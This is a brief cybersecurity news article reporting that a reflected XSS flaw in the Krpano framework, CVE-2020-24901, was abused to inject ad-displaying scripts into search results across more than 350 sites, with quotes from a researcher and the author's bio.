Flaw allowed threat actors to inject malicious scripts displaying dubious ads on search results.
More than 350 websites have been compromised as part of a campaign that involved the abuse of an old medium-severity reflected cross-site scripting vulnerability in the Krpano framework.
Security researcher Oleg Zaytsev, in a report shared with The Hacker News, said “it was an industrial-scale abuse of trusted domains." Exploiting the reflected XSS flaw, tracked as CVE-2020-24901, allowed threat actors to inject malicious scripts displaying dubious ads on search results.
"A reflected XSS is a fun vulnerability but on its own requires user interaction, and one of the biggest challenges is to make people click your reflected XSS link. So using search engines as a distribution platform for your XSS is a very creative and cool way to do it," said Zaytsev.
Written by
Dan Raywood
Senior Editor
SC Media UK
Dan Raywood is a B2B journalist with more than 20 years of experience, including covering cybersecurity for the past 16 years. He has extensively covered topics from Advanced Persistent Threats and nation-state hackers to major data breaches and regulatory changes.
He has spoken at events including 44CON, Infosecurity Europe, RANT Conference, BSides Scotland, Steelcon and ESET Security Days.
Outside work, Dan enjoys supporting Tottenham Hotspur, managing mischievous cats, and sampling craft beers.
